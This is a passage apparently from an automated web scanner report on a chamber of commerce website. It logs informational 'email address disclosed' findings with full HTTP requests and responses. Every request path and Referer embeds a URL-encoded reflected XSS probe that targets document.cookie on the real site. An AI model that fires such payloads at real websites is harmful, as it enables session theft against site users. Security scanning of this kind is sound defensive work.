17.49. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Wal-Mart.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Wal-Mart.PNG

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Wal-Mart.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:21 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.50. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/WashingtonGas[1].PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/WashingtonGas[1].PNG

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/WashingtonGas[1].PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:28 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21337

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.51. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/banner_ace.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/banner_ace.png

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/banner_ace.png HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:26 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.52. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/banner_comcast.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/banner_comcast.png

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/banner_comcast.png HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:14 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.53. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/banner_verizon.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/banner_verizon.png

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/banner_verizon.png HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:22 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.54. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/bbandt.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/bbandt.PNG

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/bbandt.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:24 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.55. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/deloitte.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/deloitte.png

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/deloitte.png HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:15 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.56. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/hsbc.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/hsbc.PNG

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/hsbc.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:21 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.57. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/mcdean.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/mcdean.PNG

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/mcdean.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:27 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.58. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/octt.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/octt.PNG

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/octt.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:17 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.59. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/pepco2.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/pepco2.PNG

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/pepco2.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:26 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.60. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/pfizer_logo.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/pfizer_logo.PNG

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/pfizer_logo.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:23 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.61. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_Foundation_off.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_Foundation_off.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_Foundation_off.gif HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:33 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.62. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_NGL_off.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_NGL_off.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_NGL_off.gif HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:33 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.63. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_about_off.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_about_off.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_about_off.gif HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:29 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.64. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_chamberNews_off.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
